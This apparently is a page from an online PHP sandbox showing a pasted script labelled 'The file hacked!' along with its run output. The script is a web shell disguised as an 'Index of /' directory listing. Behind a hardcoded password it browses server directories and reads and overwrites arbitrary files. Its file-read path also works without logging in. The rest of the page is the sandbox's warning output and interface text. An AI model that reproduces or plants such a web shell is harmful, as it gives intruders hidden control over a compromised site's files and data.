@ 2014-03-21T13:54:21Z <?php //The file hacked! ?>
<html>
<title>Index of /</title>
<?php
session_start();
define('PASSWORD', 'MosheBenLulu');
header('Content-Type: text/html; charset=utf-8');
if($_GET['page'] == 'get')
{
if(isset($_SESSION['utf8-52']) && $_SESSION['utf8-52'] == 'indexed')
{
?>
<form method="post">
<h1>Index of /<?php echo $_GET['dir']; ?><a href="?page=logout" style="color:white;">LOGOUT</a></h1>
<ul>
<?php
if(!isset($_GET['dir']))
{
$handle = opendir('.');
$dir = "";
}
else
{
$handle = opendir($_GET['dir']);
$dir = $_GET['dir'].'/';
$dd = explode("/", $dir);
$dc = 0;
$bb = "";
while($dc < count($dd)-2)
{
if($bb == "")
{
$bb = $dd[$dc];
}
else
{
$bb = $bb.'/'.$dd[$dc];
}
$dc++;
}
if($bb == "")
{
echo "<li><a href='?page=get'>Parent Directory</a></li>";
}
else
{
echo "<li><a href='?page=get&dir={$bb}'>Parent Directory</a></li>";
}
}
while (false !== ($entry = readdir($handle))) {
if ($entry != "." && $entry != "..") {
$bl = $dir.$entry;
if(is_dir($bl))
{
echo "<li><a href='?page=get&dir={$dir}{$entry}'>$entry</a></li>";
}
else
{
echo "<li><a href='?page=set&file={$dir}{$entry}'>$entry</a></li>";
}
}
}
closedir($handle);
?>
<ul>
</form>
<?php
}
else
{
?>
<form method="post">
<input type="password" name="password" />
<input type="submit" name="submit" />
</form>
<?php
if(isset($_POST['submit']))
{
$password = $_POST['password'];
if($password == PASSWORD)
{
$_SESSION['utf8-52'] = 'indexed';
echo '<script>top.location="";</script>';
}
}
}
}
elseif($_GET['page'] == 'set')
{
$filename = $_GET['file'];
?>
<form method="post">
<textarea name="text" rows="50" cols="100"><?php
$handle = fopen($filename, "r+");
if(filesize($filename) == 0)
{
$contents = fread($handle, 1);
}
else
{
$contents = fread($handle, filesize($filename));
}
echo($contents);
?></textarea><br />
<input type="submit" name="sub1" value="Save" />
<input type="submit" name="sub2" value="Cancel" />
</form>
<?php
}
elseif($_GET['page'] == 'logout')
{
$_SESSION['utf8-52'] = "";
echo '<script>alert("Logout!");top.location="?";</script>';
}
else
{
header("HTTP/1.1 404 Not Found");
}
if(isset($_POST['sub1']))
{
$file_handle = fopen($filename, 'w');
fwrite($file_handle, $_POST['text']);
fclose($file_handle);
echo '<script>alert("Edited!");top.location="?page=get";</script>';
}
if(isset($_POST['sub2']))
{
$dd = explode("/", $filename);
$dc = 0;
$bb = "";
while($dc < count($dd)-1)
{
if($bb == "")
{
$bb = $dd[$dc];
}
else
{
$bb = $bb.'/'.$dd[$dc];
}
$dc++;
}
if($bb == "")
{
echo '<script>top.location="?page=get";</script>';
}
else
{
echo '<script>top.location="?page=get&dir='.$bb.'";</script>';
}
}
?>
</html>
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Output for git.master , git.master_jit , rfc.property-hooks <html>
<title>Index of /</title>
Warning: session_start(): Session cannot be started after headers have already been sent in /in/pQMUD on line 275
Warning: Cannot modify header information - headers already sent by (output started at /in/pQMUD:2) in /in/pQMUD on line 277
Warning: Undefined array key "page" in /in/pQMUD on line 278
Warning: Undefined array key "page" in /in/pQMUD on line 358
Warning: Undefined array key "page" in /in/pQMUD on line 380
Warning: Cannot modify header information - headers already sent by (output started at /in/pQMUD:2) in /in/pQMUD on line 387
</html> This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.
Active branches Archived branches Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page
preferences:dark mode live preview
59.56 ms | 402 KiB | 8 Q